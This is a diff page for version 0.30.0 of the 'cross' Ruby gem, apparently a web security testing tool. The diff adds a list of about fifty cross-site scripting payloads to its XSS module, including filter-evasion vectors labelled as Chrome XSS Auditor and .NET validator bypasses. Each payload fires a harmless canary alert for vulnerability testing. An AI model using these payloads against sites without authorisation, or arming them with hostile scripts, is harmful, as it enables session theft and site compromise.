cross 0.20.0 → 0.30.0
Sign up to get free protection for your applications and to get access to all the features.
- data/lib/cross/version.rb +1 -1
- data/lib/cross/xss.rb +50 -1
- metadata +3 -4
- data/README.md +0 -29
data/lib/cross/version.rb
CHANGED
data/lib/cross/xss.rb
CHANGED
@@ -9,7 +9,56 @@ module Cross
|
|
9
9
|
"/--><script>alert('cross canary');</script>",
|
10
10
|
"/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
|
11
11
|
"//;-->alert('cross canary');",
|
12
|
-
"\"//;\nalert('cross canary');"
|
12
|
+
"\"//;\nalert('cross canary');",
|
13
|
+
# more exotic vectors (antisnatchor's collection)
|
14
|
+
"<script/anyjunk>alert('cross canary')</script>",
|
15
|
+
"<<script>alert('cross canary');//<</script>",
|
16
|
+
"<img onerror=alert('cross canary') src=a>",
|
17
|
+
"<xml onreadystatechange=alert('cross canary')>",
|
18
|
+
"<style onreadystatechange=alert('cross canary')>",
|
19
|
+
"<iframe onreadystatechange=alert('cross canary')>",
|
20
|
+
"<object onerror=alert('cross canary')>",
|
21
|
+
"<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
|
22
|
+
"<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
|
23
|
+
"<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
|
24
|
+
"<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
|
25
|
+
"<script onreadystatechange=alert('cross canary')>",
|
26
|
+
"<bgsound onpropertychange=alert('cross canary')>",
|
27
|
+
"<body onbeforeactivate=alert('cross canary')>",
|
28
|
+
"<body onfocusin=alert('cross canary')>",
|
29
|
+
"<input autofocus onfocus=alert('cross canary')>",
|
30
|
+
"<input onblur=alert('cross canary') autofocus><input autofocus>",
|
31
|
+
"<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
|
32
|
+
"</a onmousemove=alert('cross canary')>",
|
33
|
+
"<video src=1 onerror=alert('cross canary')>",
|
34
|
+
"<audio src=1 onerror=alert('cross canary')>",
|
35
|
+
"<object data=javascript:alert('cross canary')>",
|
36
|
+
"<iframe src=javascript:alert('cross canary')>",
|
37
|
+
"<embed src=javascript:alert('cross canary')>",
|
38
|
+
"<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
|
39
|
+
"<event-source src=javascript:alert('cross canary')>",
|
40
|
+
"<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
|
41
|
+
"<x style=x:expression(alert('cross canary'))>",
|
42
|
+
"<x onclick=alert('cross canary') src=a>Click here</x>",
|
43
|
+
"<img onerror=\"alert('cross canary')\"src=a>",
|
44
|
+
"<img onerror=`alert('cross canary')`src=a>",
|
45
|
+
"<img/onerror=\"alert('cross canary')\"src=a>",
|
46
|
+
"<img onerror=alert('cross canary') src=a>",
|
47
|
+
"<img onerror=alert('cross canary') src=a>",
|
48
|
+
"<img onerror=alert('cross canary') src=a>",
|
49
|
+
"<img onerror=alert('cross canary') src=a>",
|
50
|
+
"<img onerror=alert('cross canary') src=a>",
|
51
|
+
"<img onerror=alert('cross canary') src=a>",
|
52
|
+
"<img onerror=alert('cross canary') src=a>",
|
53
|
+
"<img onerror=alert('cross canary') src=a>",
|
54
|
+
"<img onerror=alert('cross canary') src=a>",
|
55
|
+
"<script>function::['alert']('cross canary')</script>",
|
56
|
+
"<svg><script>//
alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
|
57
|
+
"<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
|
58
|
+
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
|
59
|
+
"+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
|
60
|
+
"},alert('cross canary'),function x(){//", # DOM breaker
|
61
|
+
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
|
13
62
|
]
|
14
63
|
evasions.each do |pattern|
|
15
64
|
yield pattern if block_given?
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: cross
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.
|
4
|
+
version: 0.30.0
|
5
5
|
prerelease:
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
@@ -121,7 +121,6 @@ files:
|
|
121
121
|
- .rvmrc
|
122
122
|
- Gemfile
|
123
123
|
- LICENSE
|
124
|
-
- README.md
|
125
124
|
- README.rdoc
|
126
125
|
- Rakefile
|
127
126
|
- VERSION
|
@@ -147,7 +146,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
|
|
147
146
|
version: '0'
|
148
147
|
segments:
|
149
148
|
- 0
|
150
|
-
hash:
|
149
|
+
hash: 3227883298359843932
|
151
150
|
required_rubygems_version: !ruby/object:Gem::Requirement
|
152
151
|
none: false
|
153
152
|
requirements:
|
@@ -156,7 +155,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
156
155
|
version: '0'
|
157
156
|
segments:
|
158
157
|
- 0
|
159
|
-
hash:
|
158
|
+
hash: 3227883298359843932
|
160
159
|
requirements: []
|
161
160
|
rubyforge_project:
|
162
161
|
rubygems_version: 1.8.24
|
data/README.md
DELETED
@@ -1,29 +0,0 @@
|
|
1
|
-
# Cross
|
2
|
-
|
3
|
-
TODO: Write a gem description
|
4
|
-
|
5
|
-
## Installation
|
6
|
-
|
7
|
-
Add this line to your application's Gemfile:
|
8
|
-
|
9
|
-
gem 'cross'
|
10
|
-
|
11
|
-
And then execute:
|
12
|
-
|
13
|
-
$ bundle
|
14
|
-
|
15
|
-
Or install it yourself as:
|
16
|
-
|
17
|
-
$ gem install cross
|
18
|
-
|
19
|
-
## Usage
|
20
|
-
|
21
|
-
TODO: Write usage instructions here
|
22
|
-
|
23
|
-
## Contributing
|
24
|
-
|
25
|
-
1. Fork it
|
26
|
-
2. Create your feature branch (`git checkout -b my-new-feature`)
|
27
|
-
3. Commit your changes (`git commit -am 'Added some feature'`)
|
28
|
-
4. Push to the branch (`git push origin my-new-feature`)
|
29
|
-
5. Create new Pull Request
|